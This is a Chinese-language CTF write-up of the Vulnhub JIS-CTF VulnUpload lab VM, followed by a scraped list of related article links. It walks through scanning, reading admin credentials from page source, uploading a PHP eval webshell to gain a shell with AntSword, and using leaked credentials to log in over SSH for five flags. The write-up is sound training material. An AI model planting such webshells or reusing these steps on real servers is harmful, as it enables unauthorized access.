【Vulnhub】之JIS-CTF-VulnUpload-CTF01
一、 部署方法
- 在官网上下载靶机ova环境:http://www.mediafire.com/file/t5b4nkynxkm9hj2/CTF01.ova
- 使用VMware搭建靶机环境
- 攻击机使用VMware上搭建的kali
- 靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。
二、 靶机下载安装
靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤
三、渗透测试
根据镜像描述我们预先得知此镜像有5个flag,现在让我们开始吧!
第一个flag
arp-scan -l
扫描网段
这里发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131
使用nmap进行深度的扫描
nmap -A -T4 -p- 192.168.15.128
这里发现靶机开放了ssh 22端口,http 80端口。并在robots.txt中,发现疑似flag。
我们尝试浏览器输入 http://192.168.15.128/flag 去访问
发现flag1:{8734509128730458630012095}
第二个flag
接下来我们尝试使用dirsearch扫描一下网页目录
dirsearch -u 192.168.15.128
http://192.168.15.128/admin_area/
http://192.168.15.128/assets/
http://192.168.15.128/css/
在浏览器中访问http://192.168.15.128/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。
发现flag2:{7412574125871236547895214}
第三个flag
浏览器访问http://192.168.15.128 ,使用刚才得到的admin用户及密码3v1l_H@ck3r尝试登录。
成功进入后发现是可以上传文件的页面,可以尝试是否存在文件上传漏洞
写入一句话木马到文件中
<?php eval($_REQUEST[password]); ?>
使用中国蚁剑进行连接
连接成功,说明存在文件上传漏洞
查看hint.txt文件,发现flag3以及提示查找用户technawi
发现flag3:{7645110034526579012345670}
第四个flag
刚才在第三个flag提示我们用technawi去读取flag.txt文件,可以在隐藏文件中找到用户的信息
try to find user technawi password to read the flag.txt file, you can find it in a hidden file
蚁剑打开虚拟终端,查找用户信息,2>/dev/null是过滤掉类似没有权限的信息
find / -user 'technawi' 2>/dev/null
此时我们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ,我们尝试去读一下里面的信息,得到flag4以及username和password
发现flag4: {7845658974123568974185412}
第五个flag
根据flag3的提示,我们登录technawi用户直接查看/var/www/html/flag.txt
ssh technawi@192.168.15.128
cat /var/www/html/flag.txt
发现flag5:{5473215946785213456975249}
四、总结
此靶机一共找到了5个flag,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag。
【Vulnhub】之JIS-CTF-VulnUpload-CTF01相关推荐
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...
- ATTCK实战系列——红队实战(五)
ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...
- ctf比赛/学习资源整理,记得收藏!
最近CTF比赛很多,对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具 首先给大家推荐我自己常用的3个CT ...
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 转载的ctf练习链接
正文如下: Author:4ido10n Home:http://www.secbox.cn/author/4ido10n 学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具 首先给大家推荐我自己常用的3个CTF在线工具网站,内容 ...
- CTF入门指南(0基础)
ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows.linux.小型机等 misc 杂项,隐写,数 ...
- vulnhub靶场——THE PLANETS:EARTH
THE PLANETS:EARTH 准备 攻击机: kali 靶机: THE PLANETS:EARTH NAT 192.168.91.0 网段 下载连接 [https://www.vulnhub.c ...
最新文章
- 浅析从小米造车背后探索小米集团的企业网络推广策略会有怎样的灿烂
- 九年级数学解方程50道_九年级数学知识点总结与重点难点总结,考前必看!
- linux下面安装Matlab2017b、快捷键修改、修改背景颜色(转载+自己整理)
- 本地配置DNS服务器(MAC版)
- 洛希极限 (10 分)
- webrtc 渲染_WebRTC 开发(六)摄像头采集与视频渲染分析
- myeclipse2014 mysql连接池_MyEclipse配置数据源连接池
- Shadow DOM系列1-简介
- C#实现SQL SERVER2008聚合函数
- 装机配置相关---激活win7旗舰版 office
- PMP项目管理-项目时间管理(2)
- matlab自动识别技术,基于Matlab的车牌自动识别技术研究与实现
- 为什么不太建议你通过 Python 去找工作?
- 爬虫+可视化——链家杭州二手房房源信息
- 互联网技术研发管理之绩效管理提升
- jboss eap mysql_JBOSS EAP 6 系列三 Oracle、Mysql数据源的配置(驱动)—认识模块的使用...
- FineBI 取日期的最大max、最小值min
- 2022年全球及中国智能传感器行业头部企业市场占有率及排名调研报告
- GitHub Desktop 2.0 发布;华为与俄最大电信公司签约开发 5G
- springboot整合jwt
热门文章
- 酷睿i5 10300h参数 i5 10300h处理器属于什么水平 i510300h相当于台式机
- php字符串常用内置函数
- sass安装步骤、概述、基本语法等
- 带劲!厂内全流程智能仓储物流系统
- 让我摘下星星送给你_摘下星星送给你摘下月亮送给你是哪首歌的歌词
- 从投资人发现“新大陆”,看“产融星城”为何成?
- aspose.slides for java去除水印
- CHIP-seq流程学习笔记(3)-比对软件 bowtie2
- python编写的动物识别专家系统_基于Python的动物识别专家系统
- 全排列(从大到小排列)